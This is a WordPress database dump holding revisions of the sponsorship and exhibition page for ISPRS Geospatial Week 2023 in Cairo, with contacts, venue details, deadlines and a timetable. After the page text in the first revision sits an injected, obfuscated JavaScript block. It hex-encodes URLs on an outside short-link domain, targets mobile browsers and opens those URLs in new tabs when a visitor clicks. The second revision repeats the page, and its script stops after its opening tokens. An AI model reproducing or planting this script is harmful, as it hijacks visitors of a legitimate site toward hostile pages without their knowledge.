(3753,1,'2023-02-04 06:14:34','2023-02-04 06:14:34','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</p>\n<p>&nbsp;</p>\n<p>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</p>\n<p>of dedicated workshops. More information regarding ISPRS can be found at:</p>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<p>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</p>\n<p>&nbsp;</p>\n<p>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</p>\n<p>&nbsp;</p>\n<p>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</p>\n<h5></h5>\n<p>The GSW2023 Organizing Committee.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><span style=\"font-size: 12pt;\">Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3654\" img_size=\"1600x2000\"][vc_column_text]</p>\n<h5><strong>Please note that there is a 10% discount for ISPRS Sustaining Members.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<h6><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h6>\n<h5></h5>\n<h5><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5><strong>Tel :(+203) 5497598</strong></h5>\n<h5><b>Fax:(+203) <strong>5497598</strong></b></h5>\n<p>&nbsp;</p>\n<p><strong>Main Campus</strong></p>\n<p><strong> Alexandria, </strong><strong>Miami </strong><strong>Campus</strong></p>\n<p><strong>P.O. Box 1029 -Gamal Abdelnaser st. </strong><strong>-Miami </strong></p>\n<p><strong>Tel :(+203) 5565429/ 5506042</strong></p>\n<p><b>Fax:(+203) 5487786/ 5506042  </b></p>\n<p>&nbsp;</p>\n<p><strong>Alexandria, </strong><strong>Abu kir Campus</strong></p>\n<p><strong>Tel :(+203) 5622366/ 5622388</strong></p>\n<p><b>Fax:(+203) 5610950</b>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\">\n<h5><strong>September 2</strong></h5>\n</td>\n<td width=\"189\">\n<h5><strong>9:00 – 5:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5><strong>Tutorial Day</strong></h5>\n<h5><strong>Exhibition Setup</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 3</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>12:00-17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition Opening</strong></h5>\n<h5><strong>Welcome Reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 4</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Exhibitors’ reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 5</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 15:00</strong></h5>\n<h5><strong>15:00 – 18:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Dismantle Exhibition</strong></h5>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</strong></h5>\n<p>&nbsp;</p>\n<h5><strong>INFORMATION</strong></h5>\n<p><strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-02-04 06:14:34','2023-02-04 06:14:34','',2920,'https://gsw2023.com/?p=3753',0,'revision','',0),
(3754,1,'2023-02-04 06:16:25','2023-02-04 06:16:25','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</p>\n<p>&nbsp;</p>\n<p>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</p>\n<p>of dedicated workshops. More information regarding ISPRS can be found at:</p>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<p>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</p>\n<p>&nbsp;</p>\n<p>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</p>\n<p>&nbsp;</p>\n<p>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</p>\n<h5></h5>\n<p>The GSW2023 Organizing Committee.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><span style=\"font-size: 12pt;\">Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3654\" img_size=\"1600x2000\"][vc_column_text]</p>\n<h5><strong>Please note that there is a 10% discount for ISPRS Sustaining Members.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a></u>)</p>\n<p><span style=\"font-size: 12pt;\">The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<h6><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h6>\n<h5></h5>\n<h5><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5><strong>Tel :(+203) 5497598</strong></h5>\n<h5><b>Fax:(+203) <strong>5497598</strong></b></h5>\n<p>&nbsp;</p>\n<p><strong>Main Campus</strong></p>\n<p><strong> Alexandria, </strong><strong>Miami </strong><strong>Campus</strong></p>\n<p><strong>P.O. Box 1029 -Gamal Abdelnaser st. </strong><strong>-Miami </strong></p>\n<p><strong>Tel :(+203) 5565429/ 5506042</strong></p>\n<p><b>Fax:(+203) 5487786/ 5506042  </b></p>\n<p>&nbsp;</p>\n<p><strong>Alexandria, </strong><strong>Abu kir Campus</strong></p>\n<p><strong>Tel :(+203) 5622366/ 5622388</strong></p>\n<p><b>Fax:(+203) 5610950</b>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\">\n<h5><strong>September 2</strong></h5>\n</td>\n<td width=\"189\">\n<h5><strong>9:00 – 5:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5><strong>Tutorial Day</strong></h5>\n<h5><strong>Exhibition Setup</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 3</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>12:00-17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition Opening</strong></h5>\n<h5><strong>Welcome Reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 4</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Exhibitors’ reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 5</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 15:00</strong></h5>\n<h5><strong>15:00 – 18:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Dismantle Exhibition</strong></h5>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</strong></h5>\n<p>&nbsp;</p>\n<h5><strong>INFORMATION</strong></h5>\n<p><strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 